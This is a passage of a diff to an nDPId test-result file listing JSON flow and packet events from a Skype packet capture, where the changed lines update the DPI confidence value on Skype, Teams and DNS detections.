{"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":913,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431969675950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969675950,"pkt":"0NQSxnP1PBXCt3IOCABFAABPsQsAAEARRh\/AqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":914,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675950,"flow_last_seen":1431969675950,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969675950,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"a.config.skype.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAABBH10AAEARELrAqAEinTfrkzLdnFQALfL6nFACIA2HAe7F64ULrxZmZzlp\/IcJjWPYQGVuGoQXNRtdAcprsg=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":921,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431969676429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969676429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9SBkAAEARs0rAqAEib91NpTLdnFQAKf+JnFIC4bFrPlS3SgwUQ0ZkfJhi4Ibaq\/8x3HMPk6r8UbN8"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":922,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969676429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677018,"flow_last_seen":1431969677018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969677018,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":931,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431969677018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969677018,"pkt":"0NQSxnP1PBXCt3IOCABFAABAFnhAAEAGqHLAqAEib91KJsOPAbu0bGHpAAAAALAC\/\/+PWgAAAgQFtAEDAwUBAQgKPiMSEQAAAAAEAgAA"} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431969677045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969677045,"pkt":"0NQSxnP1PBXCt3IOCABFAABP37sAAEARF2\/AqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} @@ -531,50 +531,50 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1431969677390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969677390,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fWFAAEAGQZXAqAEib91KJsOPAbu0bGHqDtZB8IAQECx6WwAAAQEICj4jE4NNf6Ta"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kxIAAEARaE7AqAEib91NpjLdnEsAK\/dAnFQCl1hxbJqFe\/EoPOrYejcO5KpAaYBpd\/JMh2XsR696PgE="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4mEQAAEARAMrAqAEinTeCpTLdnFoAJC3GnFYCIQGR7TxLVU8tswjr1LACebeVCHQalWySEQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1f9wAAEARGT3AqAEinTeCnTLdnE0AIXYPnFgCFJgmOhVj0TGqdlU73IOUBy59C5OuhQ=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNkoAAEARwOTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":950,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1431969677975,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969677975,"pkt":"0NQSxnP1PBXCt3IOCABFAABLu3AAAEARO77AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":951,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677975,"flow_last_seen":1431969677975,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969677975,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPpIgAAEARUqLAqAEiwKgBAdd3ADUAO4zaTRYBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1431969678136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1431969678136,"pkt":"0NQSxnP1PBXCt3IOCABFAABPxoMAAEARMKfAqAEiwKgBAfaEADUAO+FnvnsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlDnRyYWZmaWNtYW5hZ2VyA25ldAAAHAAB"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1431969678448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969678448,"pkt":"0NQSxnP1PBXCt3IOCABFAAA28WwAAEARPrfAqAEinTfrkTLdnFYAInUwnFoCL\/MPOOsaaRslv0+ih8hUClTBOiOZV0s="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":963,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 